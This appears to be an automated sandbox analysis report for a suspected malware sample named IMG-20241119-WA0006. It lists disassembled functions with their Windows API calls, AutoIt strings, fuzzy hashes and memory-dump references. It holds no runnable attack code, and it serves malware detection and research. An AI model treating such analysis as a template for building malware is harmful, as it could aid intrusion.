Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 98382f0df5f37edd1fd2c52a6f98e6e664e64999220217809f8d050c8387e6da
Instruction ID: 7b9f518c753e216d7114a0ac3b71b001b0364ba0c2701dc80868a05fa0b74468
Opcode Fuzzy Hash: 98382f0df5f37edd1fd2c52a6f98e6e664e64999220217809f8d050c8387e6da
Instruction Fuzzy Hash: 84112A7A900218FFDB11DFA9C985EDDBBB4FB08710F204091E604B7295D7B1AE11DB94

Function 0009B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 0009B34E: GetWindowLongW.USER32(?,000000EB), ref: 0009B35F

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0009B5A5
GetClientRect.USER32(?,?), ref: 000FE69A
GetCursorPos.USER32(?), ref: 000FE6A4
ScreenToClient.USER32(?,?), ref: 000FE6AF

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 71042d1e8ddbaed61a73724b2493b242753ef756a91003e86bf55a5bd09adbea
Instruction ID: c5fc556795cf519424fde752c274fc25dee5a4a95c7670da0935105dc435f83d
Opcode Fuzzy Hash: 71042d1e8ddbaed61a73724b2493b242753ef756a91003e86bf55a5bd09adbea
Instruction Fuzzy Hash: AD11333190002AFFCF10EF98EE85AEE7BB9EF09314F410451E942E7551D770AA81EBA1

Function 000C732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000C7352
MessageBoxW.USER32(?,?,?,?), ref: 000C7385
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 000C739B
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 000C73A2

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: f3a96ae1b0c31181abf261363a255323f6a8835bd200f84bc1d2dc175f5cf3e5
Instruction ID: 82b27ac1f9c87a6fbf476b257dc9f73f3e31b9ca2884ff50ef6bd6d1c2e7d2ad
Opcode Fuzzy Hash: f3a96ae1b0c31181abf261363a255323f6a8835bd200f84bc1d2dc175f5cf3e5
Instruction Fuzzy Hash: E211C476A04254BFC7019BACEC09F9E7BEDAB45324F144359FD25D32A1D6B08E409BA1

Function 0009D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0009D1BA
GetStockObject.GDI32(00000011), ref: 0009D1CE
SendMessageW.USER32(00000000,00000030,00000000), ref: 0009D1D8

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 67a4956176500e2f3d4e730464731900936344d4a9dfc0763306d3d6d78580c0
Instruction ID: 1a57d3b775fde840b6951b1838483dc887ab79f88c8c3ab18f7fad724f4e4385
Opcode Fuzzy Hash: 67a4956176500e2f3d4e730464731900936344d4a9dfc0763306d3d6d78580c0
Instruction Fuzzy Hash: 7411CC73141509BFEF124FA0EC50EEABBAAFF09368F050112FA1552060D772DCA0EBA0

Function 000B4DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 000B4E16

Part of subcall function 000B54F5: __fltout2.LIBCMT ref: 000B551E

__cftog_l.LIBCMT ref: 000B4E3C
__cftoe_l.LIBCMT ref: 000B4E6E

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: 7bb8b4582bb3022b83f95c9a52ad47b4d9919ca7b61c2469c987b74df4de781b
Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: F701493200014EBBCF625E84DC118EE3F67BB18355B588455FE2859132D336DAB2AB81

Function 000A7452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000A7A0D: __getptd_noexit.LIBCMT ref: 000A7A0E

__lock.LIBCMT ref: 000A748F
InterlockedDecrement.KERNEL32(?), ref: 000A74AC
_free.LIBCMT ref: 000A74BF
InterlockedIncrement.KERNEL32(00F24208), ref: 000A74D7

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: 50ffad5a3339baef60f7cd39cad712919c6437ce426785caad650b0b8af7cb0b
Instruction ID: 5050acd2dc11e74cf73e566addffabf4162994699b7767fe62e8fa116033a057
Opcode Fuzzy Hash: 50ffad5a3339baef60f7cd39cad712919c6437ce426785caad650b0b8af7cb0b
Instruction Fuzzy Hash: 3701843190AA11ABC762AFE4AD057DDBBA0BF0A721F15C019F458A7A91CB245981CFD2

Function 000A7A94 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 000A7AD8

Part of subcall function 000A7CF4: __mtinitlocknum.LIBCMT ref: 000A7D06
Part of subcall function 000A7CF4: EnterCriticalSection.KERNEL32(00000000,?,000A7ADD,0000000D), ref: 000A7D1F

InterlockedIncrement.KERNEL32(?), ref: 000A7AE5
__lock.LIBCMT ref: 000A7AF9
___addlocaleref.LIBCMT ref: 000A7B17

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
String ID:
API String ID: 1687444384-0
Opcode ID: f6b45025ca1f9af31786b88e37e63f3e624b3eab3419486549fe0ef88a2814e0
Instruction ID: d226e0a8344ecea1950f922cc8945185fd28c62e4296d3b661afcc23929bc686
Opcode Fuzzy Hash: f6b45025ca1f9af31786b88e37e63f3e624b3eab3419486549fe0ef88a2814e0
Instruction Fuzzy Hash: ED016DB1504B00DFD720DFB5D90678AB7F0EF51321F20890EE4DA976A1CBB0A680CB11

Function 000EE32E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000EE33D
_memset.LIBCMT ref: 000EE34C
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00143D00,00143D44), ref: 000EE37B
CloseHandle.KERNEL32 ref: 000EE38D

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 78e725b1ff1e4183c52d696f9f623c8e684496102e446e595e39fd9dc60dccdc
Instruction ID: 4d97b3e9619af68e21c468a36f0c86b16ff1ed7a3a4d0ad1ab6549d6fafe29d9
Opcode Fuzzy Hash: 78e725b1ff1e4183c52d696f9f623c8e684496102e446e595e39fd9dc60dccdc
Instruction Fuzzy Hash: 52F082F5940308BEE3101BE5AC45FB77E6CDB06758F404431FE18EA5B2D3B59E4086A8

Function 000EEA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 0009AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0009AFE3
Part of subcall function 0009AF83: SelectObject.GDI32(?,00000000), ref: 0009AFF2
Part of subcall function 0009AF83: BeginPath.GDI32(?), ref: 0009B009
Part of subcall function 0009AF83: SelectObject.GDI32(?,00000000), ref: 0009B033

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 000EEA8E
LineTo.GDI32(00000000,?,?), ref: 000EEA9B
EndPath.GDI32(00000000), ref: 000EEAAB
StrokePath.GDI32(00000000), ref: 000EEAB9

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 40930aa2e6b393887ff8781cbf92feeb805678392d8b4485678b7bf624d1bc45
Instruction ID: 830c46213fcb8364069e57fc9276ac290bfdc726ce5f899a9c1ae9c797339746
Opcode Fuzzy Hash: 40930aa2e6b393887ff8781cbf92feeb805678392d8b4485678b7bf624d1bc45
Instruction Fuzzy Hash: 92F05E31005299BBDB12AF94EC09FCE3F59AF06321F184101FE55614E187B49591DBD6

Function 000BC82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 000BC84A
GetWindowThreadProcessId.USER32(?,00000000), ref: 000BC85D
GetCurrentThreadId.KERNEL32 ref: 000BC864
AttachThreadInput.USER32(00000000), ref: 000BC86B

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 0790ef8c7443e611b840124037f01e7b80086aad756bb61fb719b41fda928151
Instruction ID: 519c789ec65ae6664d044c1658014b838466172fe630b3ebac4e20b3f173530d
Opcode Fuzzy Hash: 0790ef8c7443e611b840124037f01e7b80086aad756bb61fb719b41fda928151
Instruction Fuzzy Hash: 4AE0E57154122476EB215FA1EC0DEDB7F5CEF157A1F408015B54D95850CAB2C5C1D7E0

Function 000BB0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000BB0D6
OpenThreadToken.ADVAPI32(00000000,?,?,?,000BAC9D), ref: 000BB0DD
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,000BAC9D), ref: 000BB0EA
OpenProcessToken.ADVAPI32(00000000,?,?,?,000BAC9D), ref: 000BB0F1

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: f0c12c12ff77a043cc68fd73506625bca6313bbfc0033dd6d0f02a58ef51a964
Instruction ID: c4566efed9e5ce05d03e4fe96a8e0932ff37802a0000fc62b8d0b38ab3df5c0f
Opcode Fuzzy Hash: f0c12c12ff77a043cc68fd73506625bca6313bbfc0033dd6d0f02a58ef51a964
Instruction Fuzzy Hash: 68E086726012119BD7602FF16C0CB973BECEF55791F018818F2C5DA040DFB48481C760

Function 0009B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0009B496
SetTextColor.GDI32(?,000000FF), ref: 0009B4A0
SetBkMode.GDI32(?,00000001), ref: 0009B4B5
GetStockObject.GDI32(00000005), ref: 0009B4BD
GetWindowDC.USER32(?,00000000), ref: 000FDE2B
GetPixel.GDI32(00000000,00000000,00000000), ref: 000FDE38
GetPixel.GDI32(00000000,?,00000000), ref: 000FDE51
GetPixel.GDI32(00000000,00000000,?), ref: 000FDE6A
GetPixel.GDI32(00000000,?,?), ref: 000FDE8A
ReleaseDC.USER32(?,00000000), ref: 000FDE95

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 349b139431122f400a8d8342534a09164f8671b193266e8e31a91c63463f8f27
Instruction ID: ec37e00568aa4957132e432e765ee091b6db04f735763efa0fe92fe5cd50d071
Opcode Fuzzy Hash: 349b139431122f400a8d8342534a09164f8671b193266e8e31a91c63463f8f27
Instruction Fuzzy Hash: 7AE0ED31100244AADF616BB4BC0DBE83F51AB55339F14C666FBA9584E1CBB18591EB11

Function 000FB29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 000FB29A
GetDC.USER32(00000000), ref: 000FB2A4
GetDeviceCaps.GDI32(00000000,0000000C), ref: 000FB2C3
ReleaseDC.USER32 ref: 000FB2E2

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 7e1c85c9373957d0ed4cdb8a2fc275396804fbbf773c90c5c64d353aa8c75ccb
Instruction ID: 84474aefed960e91caddadc62efd7d0fd30bc0a16e1966464ff545776c235072
Opcode Fuzzy Hash: 7e1c85c9373957d0ed4cdb8a2fc275396804fbbf773c90c5c64d353aa8c75ccb
Instruction Fuzzy Hash: DFE04FB1100204EFDB005FB0E84866E7FA4EB4C350F11C80AFD9A87611CBB598809F40

Function 000BB2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 000BB2DF
UnloadUserProfile.USERENV(?,?), ref: 000BB2EB
CloseHandle.KERNEL32(?), ref: 000BB2F4
CloseHandle.KERNEL32(?), ref: 000BB2FC

Part of subcall function 000BAB24: GetProcessHeap.KERNEL32(00000000,?,000BA848), ref: 000BAB2B
Part of subcall function 000BAB24: HeapFree.KERNEL32(00000000), ref: 000BAB32

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 487b8b8df215ebd27f682392c15c8eec06bbf43e589c53f7795f544c7a0ba629
Instruction ID: fe1c39a488de03fb89480c274b05812678bc39af5de0bba969a657e5e411f880
Opcode Fuzzy Hash: 487b8b8df215ebd27f682392c15c8eec06bbf43e589c53f7795f544c7a0ba629
Instruction Fuzzy Hash: 2EE0B67A104005BBCB012BE5EC08899FFB6FF893213109221F66581971CF72A8B1EB91

Function 000FB2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 000FB2AE
GetDC.USER32(00000000), ref: 000FB2B8
GetDeviceCaps.GDI32(00000000,0000000C), ref: 000FB2C3
ReleaseDC.USER32 ref: 000FB2E2

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: e469cb3eefea40b1c9e329fa30ce48b77aee26c62e5c668cf925c9eca679073c
Instruction ID: c8bdf146b688d84a120deae27fcc5e8e63f01bdd735d36c46f3c01740daeb3cd
Opcode Fuzzy Hash: e469cb3eefea40b1c9e329fa30ce48b77aee26c62e5c668cf925c9eca679073c
Instruction Fuzzy Hash: C4E046B1500200EFDF006FB0E84866D7BA8EB4C350F11880AF99E8B611CBBA98809B00

Function 000BDCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 000BDEAA

Strings

Container, xrefs: 000BDE29
AutoIt3GUI, xrefs: 000BDE22

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 500ded25f218bada8116e36927e06c472786285810c5ccc2935628efe227cbf4
Instruction ID: 0c882a820f467b865bffd11e7f89a301bd2ffe35e16aee675e97db13b2ac3b83
Opcode Fuzzy Hash: 500ded25f218bada8116e36927e06c472786285810c5ccc2935628efe227cbf4
Instruction Fuzzy Hash: E1913770600602AFDB64DF64C884BAAB7F5FF48714F10846EF84ADB291EB71E841CB60

Function 000CDE7C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0009C6F4: _wcscpy.LIBCMT ref: 0009C717

Part of subcall function 0008936C: __swprintf.LIBCMT ref: 000893AB
Part of subcall function 0008936C: __itow.LIBCMT ref: 000893DF

__wcsnicmp.LIBCMT ref: 000CDEFD
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 000CDFC6

Strings

LPT, xrefs: 000CDEF7

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: f0cb41e1e1d551b226852c915f144131e9ee1d075bb1a2653e5c9f4d8abe35ab
Instruction ID: c44deaac78cbde90532f4689e1a58d64565e7d7dfc87355049ecee1c52011fd4
Opcode Fuzzy Hash: f0cb41e1e1d551b226852c915f144131e9ee1d075bb1a2653e5c9f4d8abe35ab
Instruction Fuzzy Hash: D0616975A00215AFCB14EF98C891FEEB7F4BB18310F15406EF546AB291DB70AE81DB90

Function 0009BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0009BCDA
GlobalMemoryStatusEx.KERNEL32 ref: 0009BCF3

Strings

@, xrefs: 0009BCE8

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 14b7730bf44ee98fa27ae6c02deeae4e8626ed864cad7414451795b7880f11e4
Instruction ID: cf2a99d324237b1fe3275df778803df2d01eda53cc36052933421d774a95de60
